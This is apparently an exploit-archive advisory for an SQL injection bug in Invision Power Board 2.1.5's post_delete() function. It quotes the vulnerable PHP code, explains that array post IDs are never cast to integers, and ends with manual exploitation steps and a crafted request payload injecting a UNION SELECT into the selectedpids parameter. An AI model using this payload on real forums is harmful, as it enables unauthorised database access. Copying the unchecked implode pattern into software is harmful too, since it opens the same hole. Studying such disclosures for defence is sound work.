Invision Power Board v2.1.5 Remote SQL Injection

Filename		:- func_mod.php
Functionname	:- post_delete()
Lines			:- 89 To 209

Bug Found By :- Devil-00

	Greetz :-
    		Rock Master ^ Hackers Pal ^ n0m4rcy ^
            		www.securtygurus.net

[Code]

		if ( is_array( $id ) )
		{
			if ( count($id) > 0 )
			{
				$pid = " IN(".implode(",",$id).")";
			}
			else
			{
				return FALSE;
			}
		}
		else
		{
			if ( intval($id) )
			{
				$pid   = "=$id";
			}
			else
			{
				return FALSE;
			}
		}

[/CODE]

When $id = array .. the code don't check it if ( INTVAL )

[CODE]
if ( count($id) > 0 )
			{
				$pid = " IN(".implode(",",$id).")";
			}
[/CODE]

Then We Can Do SQL Injection  Here >>

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );
[/CODE]

And Here >>

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );
[/CODE]

Cuz We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit :( Baaad :(

Exm. To Exploit

	1- First Add 2 Post
    2- Check It To Delete
    	3- Edit String Query By HTTPLiveHeader

[CODE]
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete
[/CODE]